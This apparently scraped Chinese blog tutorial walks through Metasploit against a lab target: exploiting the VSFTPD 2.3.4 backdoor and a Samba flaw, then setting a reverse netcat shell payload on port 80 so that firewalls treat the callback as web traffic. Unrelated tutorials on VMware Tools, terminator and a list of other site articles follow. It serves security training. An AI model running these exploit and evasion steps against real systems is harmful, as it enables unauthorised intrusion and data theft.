8.FTP后门命令执行----Samba命令执行----VMware安装kali----多终端显示
FTP后门命令执行
再次声明,最近听闻不得教受工具使用等言论。
我敢打包票,网络空间安全一级学科的老师和学生是不会说这句话的。未知攻,焉知防。
有工具来检测自己和玩弄它,是幸运的。
犯罪者不会给你提供任何的漏洞利用工具让你玩弄。
他们的工具里面包含的漏洞是自己研发出来的。
因此,您所有看得见的工具都是用于安全的学习和培养安全性人才而使用的,是最低级别的技术。
如果这样的工具和教程都能够对公司和国家构成危害的话,那么犯罪者就更加的可以肆无忌惮的发布攻击。
我们的工具学习和掌握如同在学小学一年级,犯罪者使用的工具是大学级别。
工具都不让发布和用于教学,还谈什么国家安全,拿什么认知和技能去防御真正的攻击。
metasploit是rapid7开发的 www.rapid7.com
它是一个大型漏洞利用数据库,可以创造属于自己的漏洞
为了安全性检测,利用它和修补漏洞
parrot:msfconsole
help
use show set exploit
谷歌 rapid7 进入 vulnerability & Exploit Database 查询 VSFTPD v2.3.4 Backdoor Command Execution
use 复制粘贴模块名字
show options
set RHOST 靶机IP
show options
exploit
uname -r uname -a ls
Samba命令执行
谷歌 rapid7 进入 vulnerability & Exploit Database 查询到zenmap对应的samba模块 获取模块的信息
samba服务器运行它没有后门
唯一的方式是利用缓冲区溢出,使用有效载荷
use 复制粘贴模块名字
options
set RHOST 靶机ip
clear
show payloads
选择 cmd/unix/reverse_netcat 复制
set payload 复制粘贴
options
设置自己的监听端口为80,靶机访问80端口防火墙会认为它在访问网站,让可疑程度降低
如果反向连接出来的端口是一个奇怪的数字,防火墙会阻止这个连接,说这个可疑
set LHOST 本机IP
exploit
uname -a ls cd /root ls cat vnc.log
VMware安装kali
pureVPN赞助
从桌面光盘进去把VMware Tools拿到桌面解压 进去后右键运行终端
perl vmware-install.pl
一切配置默认,注销后生效
多终端显示
apt-get install terminator
打开terminator
top
namp
右键选择垂直分开
多终端显示
8.FTP后门命令执行----Samba命令执行----VMware安装kali----多终端显示的更多相关文章
- 使用 FileZilla FTP Client连接Vsftpd在执行LIST命令后提示连接超时
使用 FileZilla FTP Client 连接 Vsftpd在执行LIST命令后提示连接超时. vi /etc/vsftpd/vsftpd.conf 添加: #开启被动模式 pasv_enabl ...
- salt常用命令、模块、执行
一.salt常用命令 salt 该命令执行salt的执行模块,通常在master端运行,也是我们最常用到的命令 salt [options] '<target>' <function ...
- [转帖]linux screen 命令详解,xshell关掉窗口或者断开连接,查看断开前执行的命令
linux screen 命令详解,xshell关掉窗口或者断开连接,查看断开前执行的命令 https://binwaer.com/post/12.html yun install -y screen ...
- 渗透技巧——如何逃逸Linux的受限制shell执行任意命令
导语:本文介绍了如何在受限制的shell中执行任意命令,实现交互.其相应的利用场景是说当我们通过一些手段拿到当前Linux机器的shell时,由于当前shell的限制,很多命令不能执行,导致后续的渗透 ...
- ansible使用临时命令通过模块来执行任务
使用临时命令通过模块来执行任务 一.查看系统上安装的所有模块 ansible-doc -l 查看ping模块帮助文档 ansible-doc ping 1.ansible模块 文件模块: copy:将 ...
- 【每日一linux命令2】命令执行顺序:
二.命令顺序: 若在 shell 内置的命令/bin 以及/usr/bin 之下都出现了命令 pwd,那当我们执行该命令时,会执行哪 一个?答案是第一优先执行 shell 内置的命令,再执行路 ...
- 在程序中执行shell命令
在linux系统下的操作中我们会经常用到shell命令来进行,一开始学习进程的时候对于shell命令也进行了思考,认为shell命令就是一个进程的外壳,经过了后来的学习对于这一点也有了更多的认识. 用 ...
- Linux远程执行Shell命令或脚本
## 远程执行shell命令 ssh [user]@[server] '[command]' # eg. ssh root@192.168.1.1 'uptime' ## 远程执行本地shell脚本 ...
- 解决idea中执行maven命令失败的问题
1.问题描述 如上图所示,在使用idea 里的maven命令执行项目打包时,有时候会报如下一个错误. -Dmaven.multiModuleProjectDirectory system proper ...
随机推荐
- u-boot v2018.01 启动流程分析
https://blog.csdn.net/weixin_39655765/article/details/80058644#jump1 make smdkc100_defconfig 以被默 ...
- 解决 i18n properties文件中文必须是unicode的问题
解决 i18n properties文件中文必须是unicode的问题 i18n unicode UTF-8 目前产品需要做国际化,但 java 的 I18N 资源文件中中文必须转换成 unic ...
- Hadoop中配置环境后重启失效解决方法
Ubuntu下设置环境变量有三种方法,一种用于当前终端,一种用于当前用户,一种用于所有用户: 一:用于当前终端: 在当前终端中输入:export PATH=$PATH:<路径> 不过上面的 ...
- C++常用速查
int main() { int arr[2][5] = { {1,8,12,20,25}, {5,9,13,24,26} }; } void f(double p[][10]) { } #inclu ...
- 【NOIP2017提高组模拟12.17】环
题目 小A有一个环,环上有n个正整数.他有特殊的能力,能将环切成k段,每段包含一个或者多个数字.对于一个切分方案,小A将以如下方式计算优美程度: 首先对于每一段,求出他们的数字和.然后对于每段的和,求 ...
- python 操作符**与*的用法
- 【leetcode】1217. Play with Chips
题目如下: There are some chips, and the i-th chip is at position chips[i]. You can perform any of the tw ...
- 联系人:ContactsContract类
Android系统管理联系人的URI如下: ContactsContract.Contacts.CONTENT_URI 管理联系 ...
- java语言课堂动手动脑
1 运行 TestInherits.java 示例,观察输出,注意总结父类与子类之间构造方法的调用关系修改Parent构造方法的代码,显式调用GrandParent的另一个构造函数,注意这句调用代码是 ...
- (67)c++后台开发
还记得自己在学校的时候,一直都比较注重的是:编程语言+数据结构与算法.没错,对于一个在校的计算机专业的学生,这是很重要的方面.但是,这往往不够,或许是因为毕业前一直没有进入企业实习,以至于自己在毕业之 ...